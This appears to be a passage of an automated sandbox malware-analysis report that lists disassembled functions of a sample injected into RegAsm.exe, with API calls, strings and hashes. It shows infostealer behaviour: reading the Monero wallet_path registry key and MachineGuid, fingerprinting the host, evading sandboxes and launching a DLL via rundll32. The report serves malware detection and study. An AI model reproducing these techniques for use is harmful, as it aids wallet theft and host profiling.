Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID: V@
API String ID: 2311089104-383300688
Opcode ID: d63a5464314b69c61ac75c0db440d02a9ca78bdcd81ff691c89ea163c61aca46
Instruction ID: 10e4ee5bcd24e5c00d10c93a2cb3902743b6293cd5753d2e79081f11b23a5eb1
Opcode Fuzzy Hash: d63a5464314b69c61ac75c0db440d02a9ca78bdcd81ff691c89ea163c61aca46
Instruction Fuzzy Hash: 47116070900204EFDF25DF64DD88EAF7BB9EB48741F20056AF481F2290EB769A85DB11

Function 004115D4 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 48registryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00411607
RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 00411626
RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 0041164B
CharToOemA.USER32(?,?), ref: 0041166B

Strings

MachineGuid, xrefs: 00411640
SOFTWARE\Microsoft\Cryptography, xrefs: 0041161C

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CharOpenQueryValue_memset
String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
API String ID: 2355623204-1211650757
Opcode ID: ef8e750435fd874f5544eab0802719870d73a3aabe5340ca703cc68e518caacf
Instruction ID: 75e31153c2228976b0cf0a8f1d4bbd960c746e32b60f2683a95406e25632d02a
Opcode Fuzzy Hash: ef8e750435fd874f5544eab0802719870d73a3aabe5340ca703cc68e518caacf
Instruction Fuzzy Hash: CC111EB590021DAFDB10DF90DC89FEAB7BDEB08309F4041E6A659E2052D7759F888F14

Function 00401A51 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 35memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00401A65
HeapAlloc.KERNEL32(00000000), ref: 00401A6C
RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00401AE9), ref: 00401A89
RegQueryValueExA.ADVAPI32(00401AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401AA4

Strings

wallet_path, xrefs: 00401A9C
SOFTWARE\monero-project\monero-core, xrefs: 00401A7F

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID: SOFTWARE\monero-project\monero-core$wallet_path
API String ID: 3676486918-4244082812
Opcode ID: 724872420e6656dc421950b0da405abf7eebffbf311253c609d29da366c3edf5
Instruction ID: a12903c7620fb5d6c8df92349d75cdfb1a5743fd57e0ed8a0c6fb3df1ac1df80
Opcode Fuzzy Hash: 724872420e6656dc421950b0da405abf7eebffbf311253c609d29da366c3edf5
Instruction Fuzzy Hash: ACF03075640304BFEB149B90DC0AFAA7A69DB44B06F141065B601B5190E6B66A509A24

Function 00411757 Relevance: 9.1, APIs: 6, Instructions: 58commemoryCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 0041175E
CoCreateInstance.OLE32(004331B0,00000000,00000001,0043AF60,?,00000018,00411901,?), ref: 00411781
SysAllocString.OLEAUT32(?), ref: 0041178E
_wtoi64.MSVCRT ref: 004117C1
SysFreeString.OLEAUT32(?), ref: 004117DA
SysFreeString.OLEAUT32(00000000), ref: 004117E1

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: String$Free$AllocCreateH_prolog3_catchInstance_wtoi64
String ID:
API String ID: 181426013-0
Opcode ID: 2a8a8d3a5fb5e4c548b2e74474f278fcd92b95a51f6f99006cb2dd729b002af8
Instruction ID: 49cd324ebe81867dc14fdb11462f5a122b1e841d4163eb6196de4943798d3ef6
Opcode Fuzzy Hash: 2a8a8d3a5fb5e4c548b2e74474f278fcd92b95a51f6f99006cb2dd729b002af8
Instruction Fuzzy Hash: 71115170A0424ADFCB019FA4CC999EEBBB5AF48300F54417EF215E72A0CB355945CB59

Function 004010F0 Relevance: 9.1, APIs: 6, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,001E5D70,00003000,00000004), ref: 004010AA
_memset.LIBCMT ref: 004010D0
VirtualFree.KERNEL32(00000000,001E5D70,00008000), ref: 004010E6
GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,004184CC), ref: 00401100
VirtualAllocExNuma.KERNEL32(00000000), ref: 00401107
ExitProcess.KERNEL32 ref: 00401112

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Virtual$AllocProcess$CurrentExitFreeNuma_memset
String ID:
API String ID: 1859398019-0
Opcode ID: 0501fa894185b91e7b693979df3d5285810351213a83039d854fa14beaa21ce0
Instruction ID: 2816971d78f640c5210f5c3df2c68b6a36055d88f9abb901e61d14fe4f69d22d
Opcode Fuzzy Hash: 0501fa894185b91e7b693979df3d5285810351213a83039d854fa14beaa21ce0
Instruction Fuzzy Hash: 30F0C87238122077F22412763C6EF6B1A6C9B41F56F205035F308FB2D0D6699804967C

Function 00412962 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 182COMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

ShellExecuteEx.SHELL32(?), ref: 00412B84

Strings

C:\ProgramData\, xrefs: 00412995
.dll, xrefs: 004129ED
"" , xrefs: 00412A32
C:\Windows\system32\rundll32.exe, xrefs: 00412AE3

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
String ID: "" $.dll$C:\ProgramData\$C:\Windows\system32\rundll32.exe
API String ID: 2215929589-2108736111
Opcode ID: c76b9356db023fdea971dc893b2b920fd300fe1c02b79897c04016921bfa74e0
Instruction ID: fcd8ae3be328f2bece2d36ab058f070ab7b5b8f350f6457e4fbb623da5ab610c
Opcode Fuzzy Hash: c76b9356db023fdea971dc893b2b920fd300fe1c02b79897c04016921bfa74e0
Instruction Fuzzy Hash: 4871EE71E40119ABCF10FFA6DD466CDB7B5AF04308F51406BF510B7191DBB8AE8A8B98

Function 00411684 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004116CE

Part of subcall function 004123D5: malloc.MSVCRT ref: 004123DA
Part of subcall function 004123D5: strncpy.MSVCRT ref: 004123EB

lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116F6
lstrcatA.KERNEL32(?,00436ECC,?,?,?,?,?), ref: 00411713
GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Strings

Unknown, xrefs: 0041173C

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$CurrentProfile_memsetlstrcpymallocstrncpy
String ID: Unknown
API String ID: 2781187439-1654365787
Opcode ID: ab585756b44732b0c52de9de7319f605c52bcc59fa939e737159a870399f43be
Instruction ID: 5196d0f985b73c0c8bd0bad26c43f83b5151f3b6dc85e60399ef39d4da867d2e
Opcode Fuzzy Hash: ab585756b44732b0c52de9de7319f605c52bcc59fa939e737159a870399f43be
Instruction Fuzzy Hash: 6F118671A0011CABCB21EB65DD86FDD73B8AB18704F4004A6B645F7191DAB8AFC88F58

Function 00411119 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,00436910,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4,Install Date: ), ref: 00411131
HeapAlloc.KERNEL32(00000000), ref: 00411138
GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00411154
wsprintfA.USER32 ref: 0041117A

Strings

%d MB, xrefs: 00411174

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
String ID: %d MB
API String ID: 3644086013-2651807785
Opcode ID: 8862206487a5735529afe943f838936f5b8579a15e145366872ddc586f9bf33b
Instruction ID: b0b061f5290e25b68b6f7a4002290a0ac05d972f49bd8262d04e688218eddb93
Opcode Fuzzy Hash: 8862206487a5735529afe943f838936f5b8579a15e145366872ddc586f9bf33b
Instruction Fuzzy Hash: 7801A9B1E00218ABEB08DFB4DC45EEEB7B9EF08705F44006AF602D7290EA75D9818759

Function 00410B30 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B44
HeapAlloc.KERNEL32(00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B4B
RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B79
RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B95

Strings

Windows 11, xrefs: 00410B5C

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID: Windows 11
API String ID: 3676486918-2517555085
Opcode ID: e3368c902befc4cf7a45888ed36aa8236a31042c29ba286c6ff82d11e2c4ce16
Instruction ID: c636f12a4b9fd3341eb7223670fa9a8d4496e2c02347a6f2be12f88bf3247473
Opcode Fuzzy Hash: e3368c902befc4cf7a45888ed36aa8236a31042c29ba286c6ff82d11e2c4ce16
Instruction Fuzzy Hash: 1AF06875600304FBFF149BD1DC4AFAB7A7EEB4470AF1410A5F601D5190E7B6AA909714

Function 00410BA9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 36memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410BBD
HeapAlloc.KERNEL32(00000000,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410BC4
RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410BE2
RegQueryValueExA.KERNEL32(00436888,CurrentBuildNumber,00000000,00000000,00000000,000000FF,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ), ref: 00410BFD

Strings

CurrentBuildNumber, xrefs: 00410BF5

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3676486918-1022791448
Opcode ID: c84c6eb54361118da4c3cf5dc7048b6cc90d818083839d71d976e1457e1e6126
Instruction ID: adfa9e2f60a12e4d5f9b95a3627e322926d469c0f3b43989f67d349f50e983ff
Opcode Fuzzy Hash: c84c6eb54361118da4c3cf5dc7048b6cc90d818083839d71d976e1457e1e6126
Instruction Fuzzy Hash: E9F09075640304BBEF159B90DC0AFAF7A7EEB44B06F240055F601A50A0E6B25A909B50

Function 0041566F Relevance: 7.6, APIs: 5, Instructions: 107registrystringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004156A4
RegOpenKeyExA.KERNEL32(80000001,00000000,00020119,?,?,00000000,?), ref: 004156C4
RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,000000FF), ref: 004156EA
lstrcatA.KERNEL32(?,?), ref: 00415725
lstrcatA.KERNEL32(?), ref: 00415738

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$OpenQueryValue_memset
String ID:
API String ID: 3357907479-0
Opcode ID: 61c845370fa5e20ce0e4bed28fcb2d467033b3eb1257b194b560fd969d8f00f9
Instruction ID: 247fa685f6815e34cff7f8df4b350b2d93bc7a81ee75f5ea83cfe721da60279c
Opcode Fuzzy Hash: 61c845370fa5e20ce0e4bed28fcb2d467033b3eb1257b194b560fd969d8f00f9
Instruction Fuzzy Hash: 6941CE7194011D9FDF24EF60EC86EE8777ABB18309F4004AAB109A31A0EE759FC59F94

Function 0041BC21 Relevance: 7.6, APIs: 5, Instructions: 99fileCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,00000000,00000000,00000001,75BF74F0,?,0041CBEE,?,0041CC7C,00000000,06400000,00000003,00000000,0041757F,.exe,00436C5C), ref: 0041BC6E
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,75BF74F0,?,0041CBEE,?,0041CC7C,00000000,06400000,00000003,00000000), ref: 0041BCA6

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$CreatePointer
String ID:
API String ID: 2024441833-0
Opcode ID: c2a5f8e1d00489231e5594f9a747e25d59c8a13e659a0516d0e6ae57d101117a
Instruction ID: ff1efad9a67633d22899531c3285d4c1b5d125596630838d4b1aaea72c6dc67b
Opcode Fuzzy Hash: c2a5f8e1d00489231e5594f9a747e25d59c8a13e659a0516d0e6ae57d101117a
Instruction Fuzzy Hash: CA31A2F0504B049FDB348F24A9D4BA37AE8EB15314F108E2FF19682691D33898C49B99

Function 6C52C930 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 6C52C947
VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C52C969
GetSystemInfo.KERNEL32(?), ref: 6C52C9A9
VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C52C9C8
VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C52C9E2

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: Virtual$AllocInfoSystem$Free
String ID:
API String ID: 4191843772-0
